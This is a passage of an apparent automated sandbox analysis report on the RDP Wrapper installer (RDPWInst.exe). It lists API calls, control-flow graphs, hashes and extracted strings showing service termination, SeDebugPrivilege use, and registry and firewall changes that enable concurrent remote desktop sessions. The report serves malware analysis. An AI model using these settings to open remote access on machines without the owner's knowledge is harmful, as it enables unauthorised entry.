                                                      • Part of subcall function 004092D8: FindClose.KERNEL32(00000000,?,?,00000000), ref: 00409302
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                    • String ID:
                                                    • API String ID: 3216391948-0
                                                    • Opcode ID: a26faab687ad10f6bf339373f2b132671eb58a1d7de5f88059ad0fc6f14c2cf4
                                                    • Instruction ID: 6b7a5b6d94b1cbf22f3d71e7f3d695f59a60f48835f9eba26b4dd19c2a33d547
                                                    • Opcode Fuzzy Hash: a26faab687ad10f6bf339373f2b132671eb58a1d7de5f88059ad0fc6f14c2cf4
                                                    • Instruction Fuzzy Hash: 58F05E752412086FDB00DE9DD888DA677DCBF18368F4044AAF94CDF382C679EC408B64
                                                    Function 004092D8 Relevance: 3.0, APIs: 2, Instructions: 21fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,00000000), ref: 004092F2
                                                    • FindClose.KERNEL32(00000000,?,?,00000000), ref: 00409302
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Find$CloseFileFirst
                                                    • String ID:
                                                    • API String ID: 2295610775-0
                                                    • Opcode ID: 6b2b30213d2c3205255c74374c6d0cedf81d32bff8ef7784ed5e0124d95693a3
                                                    • Instruction ID: eb757cbb51915ae52a623e93d498bac1ae70d661531f8aa58739ae681ecdb70c
                                                    • Opcode Fuzzy Hash: 6b2b30213d2c3205255c74374c6d0cedf81d32bff8ef7784ed5e0124d95693a3
                                                    • Instruction Fuzzy Hash: B8D02B7250010823CA2099BC8CC9E9F734C5B05234F0803677DA8E33D1FA35D9100198
                                                    Function 00409D02 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    • Opcode ID: dcf78b23b46585e2dba9b3fc2d517005d4dfc9a18e6822ae8d97214c6ea3767e
                                                    • Instruction ID: dea72ce09e15e74ad366377f5463cd755b9610de14ca7f4492471b38ec8a052a
                                                    • Opcode Fuzzy Hash: dcf78b23b46585e2dba9b3fc2d517005d4dfc9a18e6822ae8d97214c6ea3767e
                                                    • Instruction Fuzzy Hash: 12B012106085015BC908E73D4D4744B31C01A40524FC40234745CE62C2F65DCAA546DF
                                                    Function 0044373C Relevance: 81.5, APIs: 8, Strings: 46, Instructions: 524COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 44373c-44373f 1 443744-443749 0->1 1->1 2 44374b-4437d0 call 40a2b0 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 404504 1->2 31 443876-443965 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 2->31 32 4437d6-4437f0 call 404564 call 4072a4 2->32 105 443f97-443fb1 call 406be8 31->105 42 4437f6-443810 call 404564 call 4072a4 32->42 43 44396a-443984 call 404564 call 4072a4 32->43 42->43 59 443816-443830 call 404564 call 4072a4 42->59 56 443986-4439a7 call 43cea4 call 407450 call 404cdc call 4042f8 43->56 57 4439ac-4439ba call 414708 43->57 56->105 68 4439bc-4439e8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 57->68 69 4439ed-4439f4 call 43a644 57->69 59->43 79 443836-443850 call 404564 call 4072a4 59->79 68->105 83 4439f6-443a0c call 407450 call 404cdc call 4042f8 69->83 84 443a11-443a30 call 43a7bc call 404564 call 4072a4 69->84 79->43 111 443856-443870 call 404564 call 4072a4 79->111 83->105 127 443cc4-443cde call 404564 call 4072a4 84->127 128 443a36-443a3d 84->128 111->31 111->43 150 443ce4-443ceb 127->150 151 443e6b-443e85 call 404564 call 4072a4 127->151 133 443a5f-443b13 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 407450 call 404cdc call 4042f8 call 404564 call 4072a4 128->133 134 443a3f-443a5a call 407450 call 404cdc call 4042f8 call 40632c 128->134 354 443b15-443b24 call 406bf0 133->354 355 443b26-443b30 call 406bf0 133->355 134->133 156 443d0d-443d2a call 407450 call 404cdc call 4042f8 150->156 157 443ced-443d08 call 407450 call 404cdc call 4042f8 call 40632c 150->157 177 443e87-443e8e 151->177 178 443ecb-443ee5 call 404564 call 4072a4 151->178 201 443d31-443dac call 43b7d4 call 407450 call 404cdc call 4042f8 call 43c9b4 call 407450 call 404cdc call 4042f8 call 43bf00 call 43c1c8 Sleep call 407450 call 404cdc call 4042f8 call 43d938 call 40816c 156->201 202 443d2c call 43a688 156->202 157->156 184 443eb0-443ec6 call 407450 call 404cdc call 4042f8 call 43f7a4 177->184 185 443e90-443eab call 407450 call 404cdc call 4042f8 call 40632c 177->185 178->105 215 443eeb-443f46 call 407450 call 404cdc call 4042f8 call 43b7d4 call 407450 call 404cdc call 4042f8 call 43bf00 call 43c1c8 Sleep call 40816c 178->215 184->178 185->184 343 443dd3-443e0b Sleep call 43b58c Sleep call 404564 call 4072a4 201->343 344 443dae-443dbd call 40816c 201->344 202->201 303 443f6d-443f92 Sleep call 43b58c call 407450 call 404cdc call 4042f8 215->303 304 443f48-443f57 call 40816c 215->304 303->105 304->303 318 443f59-443f5a 304->318 323 443f5c-443f6b call 43b58c 318->323 323->303 366 443e47-443e4e 343->366 367 443e0d-443e42 call 407450 call 404cdc call 4042f8 call 43e864 call 407450 call 404cdc call 4042f8 call 43f310 343->367 344->343 353 443dbf-443dc0 344->353 357 443dc2-443dd1 call 43b58c 353->357 365 443b35-443b3c 354->365 355->365 357->343 368 443b43-443b7d call 43de78 call 43b7d4 call 407450 call 404cdc call 4042f8 call 404564 call 4072a4 365->368 369 443b3e call 43a688 365->369 370 443e55-443e66 call 407450 call 404cdc call 4042f8 366->370 371 443e50 call 43a724 366->371 367->366 408 443b9f 368->408 409 443b7f-443b99 call 404564 call 4072a4 368->409 369->368 370->151 371->370 410 443ba1-443c21 call 43d0f8 call 407450 call 404cdc call 4042f8 call 43c598 call 407450 call 404cdc call 4042f8 call 43e7dc call 407450 call 404cdc call 4042f8 call 43bf00 call 43c1c8 Sleep call 40816c 408->410 409->408 418 443b9b-443b9d 409->418 446 443c23-443c32 call 40816c 410->446 447 443c48-443c9b Sleep call 43b58c Sleep call 407450 call 404cdc call 4042f8 call 43e864 call 407450 call 404cdc call 4042f8 call 43f310 410->447 418->410 446->447 452 443c34-443c35 446->452 471 443ca0-443cbd call 407450 call 404cdc call 4042f8 447->471 454 443c37-443c46 call 43b58c 452->454 454->447 471->127 478 443cbf call 43a724 471->478 478->127
                                                    Strings
                                                    • [*] Terminating service..., xrefs: 00443BE3, 00443D53, 00443F08
                                                    • LpD, xrefs: 0044374F
                                                    • -u -k uninstall wrapper and keep settings, xrefs: 0044393B
                                                    • only >= 6.0 (Vista, Server 2008 and newer) are supported., xrefs: 004439D4
                                                    • [*] Uninstalling..., xrefs: 00443D0F
                                                    • [+] Done., xrefs: 00443F83
                                                    • -r force restart Terminal Services, xrefs: 00443951
                                                    • USAGE:, xrefs: 00443878
                                                    • [*] Configuring service library..., xrefs: 00443BAD
                                                    • [*] Installing..., xrefs: 00443AE5
                                                    • SeDebugPrivilege, xrefs: 00443BF7, 00443D67, 00443F1C
                                                    • to be bound by all the terms and conditions of the license agreement., xrefs: 00443A8D
                                                    • - By using all or any portion of this software, you are agreeing, xrefs: 00443A77
                                                    • -w get latest update for INI file, xrefs: 0044390F
                                                    • %SystemRoot%\system32\rdpwrap.dll, xrefs: 00443B1A
                                                    • RDP Wrapper Library v1.6.2, xrefs: 00443777
                                                    • [+] Successfully installed., xrefs: 00443CA2
                                                    • Installer v2.5, xrefs: 0044378D
                                                    • -i -o online install mode (loads latest INI file), xrefs: 004438F9
                                                    • [*] Extracting files..., xrefs: 00443B4F
                                                    • [*] Removing files..., xrefs: 00443D87
                                                    • [*] Checking for updates..., xrefs: 00443EB2
                                                    • [*] RDP Wrapper Library is not installed., xrefs: 00443CEF, 00443E92
                                                    • [*] Configuring registry..., xrefs: 00443C68, 00443E0F
                                                    • $sD, xrefs: 00443761
                                                    • -i install wrapper to Program Files folder (default), xrefs: 004438CD
                                                    • -i -s install wrapper to System32 folder, xrefs: 004438E3
                                                    • [*] Checking dependencies..., xrefs: 00443BC8
                                                    • RDPWInst.exe [-l|-i[-s][-o]|-w|-u[-k]|-r], xrefs: 0044388E
                                                    • -u uninstall wrapper, xrefs: 00443925
                                                    • [-] Unsupported Windows version:, xrefs: 004439BE
                                                    • - To read the license agreement, run the installer with -l parameter., xrefs: 00443AA3
                                                    • -l display the license agreement, xrefs: 004438B7
                                                    • do not use the software., xrefs: 00443ACF
                                                    • %ProgramFiles%\RDP Wrapper\rdpwrap.dll, xrefs: 00443B2B
                                                    • [*] RDP Wrapper Library is already installed., xrefs: 00443A41
                                                    • [+] Successfully uninstalled., xrefs: 00443E57
                                                    • [-] Unsupported processor architecture., xrefs: 004439F8
                                                    • Copyright (C) Stas'M Corp. 2017, xrefs: 004437A3
                                                    • - If you do not agree to any terms of the license agreement,, xrefs: 00443AB9
                                                    • [*] Restarting..., xrefs: 00443EED
                                                    • [*] Notice to user:, xrefs: 00443A61
                                                    • license, xrefs: 00443989
                                                    • [*] Configuring firewall..., xrefs: 00443C85, 00443E2C
                                                    • TermService, xrefs: 00443C52, 00443DDD, 00443F77
                                                    • [*] Resetting service library..., xrefs: 00443D38
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: - By using all or any portion of this software, you are agreeing$ - If you do not agree to any terms of the license agreement,$ - To read the license agreement, run the installer with -l parameter.$ do not use the software.$ only >= 6.0 (Vista, Server 2008 and newer) are supported.$ to be bound by all the terms and conditions of the license agreement.$$sD$%ProgramFiles%\RDP Wrapper\rdpwrap.dll$%SystemRoot%\system32\rdpwrap.dll$-i install wrapper to Program Files folder (default)$-i -o online install mode (loads latest INI file)$-i -s install wrapper to System32 folder$-l display the license agreement$-r force restart Terminal Services$-u uninstall wrapper$-u -k uninstall wrapper and keep settings$-w get latest update for INI file$Copyright (C) Stas'M Corp. 2017$Installer v2.5$LpD$RDP Wrapper Library v1.6.2$RDPWInst.exe [-l|-i[-s][-o]|-w|-u[-k]|-r]$SeDebugPrivilege$TermService$USAGE:$[*] Checking dependencies...$[*] Checking for updates...$[*] Configuring firewall...$[*] Configuring registry...$[*] Configuring service library...$[*] Extracting files...$[*] Installing...$[*] Notice to user:$[*] RDP Wrapper Library is already installed.$[*] RDP Wrapper Library is not installed.$[*] Removing files...$[*] Resetting service library...$[*] Restarting...$[*] Terminating service...$[*] Uninstalling...$[+] Done.$[+] Successfully installed.$[+] Successfully uninstalled.$[-] Unsupported Windows version:$[-] Unsupported processor architecture.$license
                                                    • API String ID: 0-551293883
                                                    • Opcode ID: 7cbbb260217d7fc7a01644a9b38dd862e028c17ba3129eca6f49844f2851695a
                                                    • Instruction ID: 3b3904e08207714e519852b142ec2c0d1fdd34891fa1322cb905310c24a2fa21
                                                    • Opcode Fuzzy Hash: 7cbbb260217d7fc7a01644a9b38dd862e028c17ba3129eca6f49844f2851695a
                                                    • Instruction Fuzzy Hash: D60208A4B091404BEB00BBFB894324EA5519FC574CF92817FB604B72D7CA3CA8156A7F
                                                    Function 0043AE28 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 140serviceCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • OpenSCManagerW.ADVAPI32(00000000,ServicesActive,00000001,00000000,0043AFF3,?,?,?,00447324), ref: 0043AE85
                                                    • GetLastError.KERNEL32(00000000,ServicesActive,00000001,00000000,0043AFF3,?,?,?,00447324), ref: 0043AE90
                                                    • OpenServiceW.ADVAPI32(00000000,00000000,00000001,00000000,ServicesActive,00000001,00000000,0043AFF3,?,?,?,00447324), ref: 0043AED6
                                                    • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000001,00000000,ServicesActive,00000001,00000000,0043AFF3,?,?,?,00447324), ref: 0043AEE2
                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00000001,00000000,ServicesActive,00000001,00000000,0043AFF3,?,?,?,00447324), ref: 0043AEE7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLastOpenService$CloseHandleManager
                                                    • String ID: $sD$...$ServicesActive$[*] Checking $[-] OpenSCManager error (code $[-] OpenService error (code $[-] QueryServiceConfig error (code $[-] QueryServiceConfig failed.
                                                    • API String ID: 48634454-3812534468
                                                    • Opcode ID: 091b0035d6a152c75cbcb3aeab795098a1a073895450a053807206380d0ec52c
                                                    • Instruction ID: 7a774fc46d996de6837286bf894840c9c95f128f26b1d3a09438fbe6509dfab0
                                                    • Opcode Fuzzy Hash: 091b0035d6a152c75cbcb3aeab795098a1a073895450a053807206380d0ec52c
                                                    • Instruction Fuzzy Hash: 41418FA4A08200AAD711F7B68C42A5F76A99F88308F11917BB514B6293CB3CAD01967F
                                                    Function 0043E864 Relevance: 34.8, APIs: 7, Strings: 16, Instructions: 305COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 548 43e864-43e877 549 43e879-43e88d call 4387ec 548->549 550 43e88f-43e89b call 4387a8 548->550 555 43e89e-43e8bc call 438890 call 4389d8 549->555 550->555 560 43e8fa-43e95f call 4396b8 call 438860 555->560 561 43e8be-43e8f5 GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 555->561 572 43ed53-43ed61 call 40518c 560->572 573 43e965-43e976 call 4389d8 560->573 561->560 581 43e9b4-43ea21 call 4396b8 call 438860 call 4389d8 573->581 582 43e978-43e9af GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 573->582 601 43ea23-43ea5a GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 581->601 602 43ea5f-43eac3 call 4396b8 call 438860 call 439d1c 581->602 582->581 601->602 618 43eac8-43eaca 602->618 618->572 620 43ead0-43eae1 call 4389d8 618->620 626 43eae3-43eb1a GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 620->626 627 43eb1f-43eb38 call 438860 call 4389d8 620->627 626->627 637 43eb76-43ebf8 call 4392f0 call 439674 call 438860 call 4389d8 627->637 638 43eb3a-43eb71 GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 627->638 664 43ec36-43ecb8 call 4392f0 call 439674 call 438860 call 4389d8 637->664 665 43ebfa-43ec31 GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 637->665 638->637 686 43ecf6-43ed4e call 439674 call 438860 664->686 687 43ecba-43ecf1 GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 664->687 665->664 686->572 687->686
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,00447324), ref: 0043E8BE
                                                    • GetLastError.KERNEL32(?,?,00447324), ref: 0043E978
                                                    • GetLastError.KERNEL32(?,?,00447324), ref: 0043EA23
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID: $sD$AllowMultipleTSSessions$EnableConcurrentSessions$Name$RDPClip$RDPDND$Type$[-] OpenKey error (code $\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon$\SYSTEM\CurrentControlSet\Control\Terminal Server$\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns$\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Clip Redirector$\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\DND Redirector$\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VC$\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core$fDenyTSConnections
                                                    • API String ID: 1452528299-1114397459
                                                    • Opcode ID: 22b9b6838edb48365cdfb4778b466381cbf59e10845c44ab03fa5598231b4397
                                                    • Instruction ID: d5bff1feb4e6776106dd90f858afd21f9f4463beb35b4115f94bb768dd44f540
                                                    • Opcode Fuzzy Hash: 22b9b6838edb48365cdfb4778b466381cbf59e10845c44ab03fa5598231b4397
                                                    • Instruction Fuzzy Hash: 97A16E70B052005BEB10BBBB984256E76A5DB8D308F51A47FF400A76D2CB3DAC05972E
                                                    Function 00408F6C Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 156registrystringCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 1153 408f6c-408f95 call 406bd8 1156 408f97-408faa GetModuleFileNameW 1153->1156 1157 408fac-408fc1 call 406c7c lstrcpynW 1153->1157 1158 408fc6-408fce 1156->1158 1157->1158 1161 408fd4-408ff5 RegOpenKeyExW 1158->1161 1162 40913b-409150 call 406be0 1158->1162 1164 409055-40908f call 408d70 RegQueryValueExW 1161->1164 1165 408ff7-409013 RegOpenKeyExW 1161->1165 1172 409091-4090c2 call 4041b0 RegQueryValueExW call 406d9c 1164->1172 1173 4090c4-4090de RegQueryValueExW 1164->1173 1165->1164 1166 409015-409031 RegOpenKeyExW 1165->1166 1166->1164 1169 409033-40904f RegOpenKeyExW 1166->1169 1169->1162 1169->1164 1175 40910f-409120 1172->1175 1174 4090e0-40910a call 4041b0 RegQueryValueExW call 406d9c 1173->1174 1173->1175 1174->1175 1180 409122-409125 call 4041cc 1175->1180 1181 40912a-409133 RegCloseKey 1175->1181 1180->1181
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,00409151,?,00000000), ref: 00408FA5
                                                    • lstrcpynW.KERNEL32(?,00000000,00000105,00000000,00409151,?,00000000), ref: 00408FC1
                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,?,00000000,00000105,00000000,00409151,?,00000000), ref: 00408FEE
                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,?,00000000,00000105,00000000,00409151), ref: 0040900C
                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,?), ref: 0040902A
                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 00409048
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00409134,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,?,00000000), ref: 00409088
                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,00409134,?,80000001), ref: 004090B3
                                                    • RegQueryValueExW.ADVAPI32(?,00409208,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,00409134,?,80000001), ref: 004090D7
                                                    • RegQueryValueExW.ADVAPI32(?,00409208,00000000,00000000,?,?,?,00409208,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 00409100
                                                    • RegCloseKey.ADVAPI32(?,0040913B,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,00409134,?,80000001,Software\CodeGear\Locales), ref: 0040912E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715107589.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_RDPWInst.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: OpenQueryValue$CloseFileModuleNamelstrcpyn
                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales
                                                    • API String ID: 3482678030-345420546
                                                    • Opcode ID: b86ae2d81a9e05b6b7bf3f0ce843eb1dbeb4dae58668f089461cbe54660652d9
                                                    • Instruction ID: 299ddb9754ebd29522f96ae12af661ce277d6f97d31c05324fadffe1222b4d16
                                                    • Opcode Fuzzy Hash: b86ae2d81a9e05b6b7bf3f0ce843eb1dbeb4dae58668f089461cbe54660652d9
                                                    • Instruction Fuzzy Hash: CA510071B40209BEEB10EAA5CD46FAE77BCEB48704F504477B604F61C2D6B8AE408A5D
                                                    Function 0043A7BC Relevance: 24.2, APIs: 2, Strings: 14, Instructions: 181COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • GetLastError.KERNEL32(00000000,0043AA55,?,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443A16,00000000,00443FB2), ref: 0043A827
                                                    • GetLastError.KERNEL32(00000000,0043AA55,?,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443A16,00000000,00443FB2), ref: 0043A91D
                                                      • Part of subcall function 00438860: RegFlushKey.ADVAPI32(00010000,004375FC,004388B7,004375FC,00000001,004387C6,?,00447324,0043A802,00000000,0043AA55,?,?,00447324,00000000,00000000), ref: 00438871
                                                      • Part of subcall function 00438860: RegCloseKey.ADVAPI32(00010000,004375FC,004388B7,004375FC,00000001,004387C6,?,00447324,0043A802,00000000,0043AA55,?,?,00447324,00000000,00000000), ref: 0043887A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1714996880.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1714972455.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715033736.0000000000445000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715049388.0000000000446000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.0000000000447000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715063363.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000003.00000002.1715093178.000000000044D000.00000008.00000001.01000000.00000007.sdmpDownload File
